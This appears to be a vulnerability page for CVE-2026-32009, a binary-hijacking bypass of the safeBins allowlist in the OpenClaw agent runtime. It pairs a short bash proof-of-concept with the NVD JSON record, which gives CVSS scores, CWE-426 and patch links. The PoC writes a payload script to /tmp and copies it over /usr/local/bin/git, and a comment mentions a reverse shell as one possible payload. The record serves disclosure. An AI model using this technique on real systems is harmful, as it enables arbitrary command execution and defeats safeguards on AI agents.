CVE-2026-32009

#!/bin/bash # PoC for CVE-2026-32009: OpenClaw Binary Hijacking # Assumption: Attacker has write access to /usr/local/bin # Target: Hijacking a common binary like 'git' which OpenClaw might trust. TARGET_BINARY="git" TRUSTED_DIR="/usr/local/bin" MALICIOUS_PAYLOAD="/tmp/evil_payload.sh" # 1. Create a malicious payload (e.g., reverse shell or command execution) echo "#!/bin/bash" > $MALICIOUS_PAYLOAD echo "echo 'CVE-2026-32009 Exploit Executed'" >> $MALICIOUS_PAYLOAD echo "whoami" >> $MALICIOUS_PAYLOAD chmod +x $MALICIOUS_PAYLOAD # 2. Copy the malicious payload to the trusted directory with the target name # This assumes the target binary does not already exist or is not strictly path-resolved against specific hashes cp $MALICIOUS_PAYLOAD $TRUSTED_DIR/$TARGET_BINARY # 3. Wait for or trigger OpenClaw to execute the trusted binary # OpenClaw checks /usr/local/bin/git -> matches safeBins -> executes malicious payload echo "Malicious binary placed at $TRUSTED_DIR/$TARGET_BINARY" echo "Trigger OpenClaw execution to observe the bypass."

{"cve": {"id": "CVE-2026-32009", "sourceIdentifier": "[email protected]", "published": "2026-03-19T22:16:33.787", "lastModified": "2026-03-23T18:33:03.603", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.2.24 contain a policy bypass vulnerability in the safeBins allowlist evaluation that trusts static default directories including writable package-manager paths like /opt/homebrew/bin and /usr/local/bin. An attacker with write access to these trusted directories can place a malicious binary with the same name as an allowed executable to achieve arbitrary command execution within the OpenClaw runtime context."}, {"lang": "es", "value": "Las versiones de OpenClaw anteriores a 2026.2.24 contienen una vulnerabilidad de omisión de políticas en la evaluación de la lista de permitidos de safeBins que confía en directorios predeterminados estáticos, incluyendo rutas de gestores de paquetes escribibles como /opt/homebrew/bin y /usr/local/bin. Un atacante con acceso de escritura a estos directorios de confianza puede colocar un binario malicioso con el mismo nombre que un ejecutable permitido para lograr la ejecución arbitraria de comandos dentro del contexto de tiempo de ejecución de OpenClaw."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:H/AT:P/PR:H/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.5, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-426"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.2.24", "matchCriteriaId": "673E4DE2-44C4-485D-8BDF-6DEEB32C1A98"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/b67e600bff696ff2ed9b470826590c0ce6b3bb0a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5gj7-jf77-q2q2", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-binary-hijacking-via-static-default-trusted-directories-in-safebins", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}